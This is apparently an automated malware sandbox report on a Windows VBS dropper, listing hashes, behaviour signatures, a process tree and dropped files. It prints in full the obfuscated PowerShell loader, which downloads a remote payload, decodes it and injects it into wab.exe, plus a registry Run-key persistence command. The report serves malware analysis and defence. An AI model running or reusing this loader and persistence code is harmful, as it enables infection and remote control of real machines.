Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 14:59

General

  • Target

    5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs

  • Size

    13KB

  • MD5

    12e0264eaf14daca0cd45da32ea68c80

  • SHA1

    56774e10d374a80549d06406f52514c06634c5e4

  • SHA256

    5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66

  • SHA512

    8d80725c889c722be19dd07bda6c8ed29d2a2d5cd8f353eb5df7f4f998538c7ca8afd08993800c7cdb2772f6b5c51e78399c51e486c19fafa29f963acdc6b66e

  • SSDEEP

    192:6i9I38fdqWxBTsQqkqYK2yud66mT7LdjnPm4oTgWXvA/YJgzyv3tEQpK:1I3IddsMqYK2ndc1jO4cgZ/+GyPtLK

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1676
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • Runs ping.exe
        PID:1208
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
        3⤵
          PID:1416
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:596
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
            4⤵
              PID:516
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2468
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1348
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2872

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Droh.Lit

        Filesize

        480KB

        MD5

        1a958060ba3e3de4653959fe2fd1efd5

        SHA1

        c5d3a5646dc5920668f1f61c334c7c7d40c888b5

        SHA256

        268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab

        SHA512

        8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FNPSN90E19EQJP9QN7PC.temp

        Filesize

        7KB

        MD5

        bc28d4197085ba776631dfb6b5a2a087

        SHA1

        e0949021a788b0fc103a4862ba9eb37f710d84f1

        SHA256

        03f800e75edc2a12cf107debf20d86f1dc67b7d244ff94656f13a96415f9ff50

        SHA512

        225a7583ca4bb8214cb9a5fe8cdab943d8eedcf480aa9c8d669fb9fe975d4e214163d7ac9f659ea25f22fe31d22d7d4dc8d58f9e75a7d6e92f13ef08bf104659

      • memory/596-19-0x0000000006330000-0x0000000008BF9000-memory.dmp

        Filesize

        40.8MB

      • memory/2360-7-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-8-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-9-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-10-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-11-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-4-0x000007FEF67EE000-0x000007FEF67EF000-memory.dmp

        Filesize

        4KB

      • memory/2360-5-0x000000001B270000-0x000000001B552000-memory.dmp

        Filesize

        2.9MB

      • memory/2360-17-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2360-18-0x000007FEF67EE000-0x000007FEF67EF000-memory.dmp

        Filesize

        4KB

      • memory/2360-6-0x0000000002320000-0x0000000002328000-memory.dmp

        Filesize

        32KB

      • memory/2360-27-0x000007FEF6530000-0x000007FEF6ECD000-memory.dmp

        Filesize

        9.6MB

      • memory/2468-22-0x0000000000F30000-0x0000000001F92000-memory.dmp

        Filesize

        16.4MB